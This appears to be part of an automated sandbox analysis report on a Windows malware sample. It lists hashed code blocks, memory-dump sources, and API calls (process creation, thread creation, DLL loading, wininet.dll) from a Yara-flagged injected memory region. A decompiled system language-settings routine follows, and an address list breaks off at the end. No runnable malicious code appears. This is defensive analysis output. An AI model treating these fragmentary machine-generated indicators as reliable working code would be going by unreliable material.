                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                • Instruction ID: 5db4347087e42a734f46b48b741abacaa776633d3b9bc2b08fdfc74665a15ccb
                                                • Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                • Instruction Fuzzy Hash: 2C318FB1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A9B242D731A945DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 684a023b4645ec6ffa596f56cf9223cefe449610e4bbfd6b2ed3b1cdf9be08d1
                                                • Instruction ID: bb4b3a83bb19efeff6fa454453aa35e97c9cc51aac3c7fa36ba9db7f7e37485d
                                                • Opcode Fuzzy Hash: 684a023b4645ec6ffa596f56cf9223cefe449610e4bbfd6b2ed3b1cdf9be08d1
                                                • Instruction Fuzzy Hash: 0A2191B1641304ABDB10DFA8D8A1FABB7B8AF48700F10802DF5199B242D371A845DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: h
                                                • API String ID: 1279760036-818531735
                                                • Opcode ID: f0daaac9932d7a55e4ea936812a61876eb6769454e5defcb1f6520aa57cb4268
                                                • Instruction ID: 5a6060f95b0322023d83f94b83bb301f5f05182951cfb66e90355063b7d8d48b
                                                • Opcode Fuzzy Hash: f0daaac9932d7a55e4ea936812a61876eb6769454e5defcb1f6520aa57cb4268
                                                • Instruction Fuzzy Hash: A3F030762002146BDA24EF98DC85EE7776DEF88750F158559FA485B341C931EA14C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: ca4d217f012cc94fcc43fd2421e75402d4fc0f5ab2a7c3729c52d23e39852efc
                                                • Instruction ID: 49acb2beb42adc2e88a1e91adbe946d065e29627eed51aa8a2ca28447daf139b
                                                • Opcode Fuzzy Hash: ca4d217f012cc94fcc43fd2421e75402d4fc0f5ab2a7c3729c52d23e39852efc
                                                • Instruction Fuzzy Hash: CBF0A071100204AFDB28DF65CC45EE77B28EF48350F018589F9089B242C631D801CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                • Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
                                                • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                • Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 8c69b173ec80ca7fd522937f750aced34160b74c43ab1ca831a5d91606ae0580
                                                • Instruction ID: 021079c3abfd17a1919611e505533fbc26046f8192c1279bd0e891f865c560ab
                                                • Opcode Fuzzy Hash: 8c69b173ec80ca7fd522937f750aced34160b74c43ab1ca831a5d91606ae0580
                                                • Instruction Fuzzy Hash: 330122B2204108ABDB14DF98DC85DEBB7B9EF8C350F11C259FA1CAB241D630E901CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 0f25f694af4e0fab41f6726e7c323beaab1deca12b96f40760376d5abf12399e
                                                • Instruction ID: 2d73f66b110e87b5c823a0d4de04d6eaf6ac8865cb1daef156a8f7f13297d19c
                                                • Opcode Fuzzy Hash: 0f25f694af4e0fab41f6726e7c323beaab1deca12b96f40760376d5abf12399e
                                                • Instruction Fuzzy Hash: 3801FC716442083ADF20FB64DC46FFB37ACEB55710F054185F84C971D3D670998187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: a10df1feb702fcbfc80cc0b9837d0b42c1f8a3d365989195f0edd70b5f0e5c3f
                                                • Instruction ID: f138f83fe331e924e9124e104cecdaa3f41b311c982b532017d89ec97851cdd7
                                                • Opcode Fuzzy Hash: a10df1feb702fcbfc80cc0b9837d0b42c1f8a3d365989195f0edd70b5f0e5c3f
                                                • Instruction Fuzzy Hash: E8E06D333902043AE63065A9AC02FE7B29C8BC1B20F140026FA4DEB2C2D595F80142A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                • Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                • Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 94%
                                                			E01F08788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E01F08460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E01EEE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E01F0718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E01F08460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E01F0718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E01F08460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E01F08460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E01F08460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E01F0718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E01EE2340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E01EFE679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E01EEE2A8(_t322,  &_v68, _v16);
                                                								if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E01EFE679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E01EEE2A8(_t322,  &_v68, _t236);
                                                								if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E01F0718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E01EE2340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E01EFE679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E01EEE2A8(_v12,  &_v68, _v16);
                                                							if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E01EFE679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E01EEE2A8(_t322,  &_v68, _t269);
                                                							if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E01F0718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E01EE2340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E01EFE679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E01EEE2A8(_v12,  &_v68, _v16);
                                                						if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E01EFE679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E01EEE2A8(_t322,  &_v68, _t296);
                                                						if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}

                                                0x01f08788
                                                0x01f08788
                                                0x01f08791
                                                0x01f08794
                                                0x01f08798
                                                0x01f0879b
                                                0x01f0879e
                                                0x01f087a1
                                                0x01f087a4
                                                0x01f087a7
                                                0x01f087aa
                                                0x01f087af
                                                0x01f51ad3
                                                0x01f08b0a
                                                0x01f08b0d
                                                0x01f08b13
                                                0x01f08b19
                                                0x01f08b1f
                                                0x01f08b25
                                                0x01f08b2b
                                                0x01f08b31
                                                0x01f08b37
                                                0x01f08b3d
                                                0x01f08b46
                                                0x01f08b46
                                                0x01f087c6
                                                0x01f087d0
                                                0x01f51ae0
                                                0x01f51ae6
                                                0x01f51af8
                                                0x01f51af8
                                                0x01f51afd
                                                0x01f51afe
                                                0x01f51b01
                                                0x01f51b06
                                                0x01f51b06
                                                0x01f087d6
                                                0x01f087f2
                                                0x01f087f7
                                                0x01f08807
                                                0x01f0880a
                                                0x01f0880f
                                                0x01f08810
                                                0x01f08813
                                                0x01f08818
                                                0x01f08818
                                                0x01f0882c
                                                0x01f08831
                                                0x01f08838
                                                0x01f08908
                                                0x01f08920
                                                0x01f089f0
                                                0x01f08a08
                                                0x01f08af6
                                                0x01f08af6
                                                0x01f08af8
                                                0x01f08afb
                                                0x01f51beb
                                                0x01f51beb
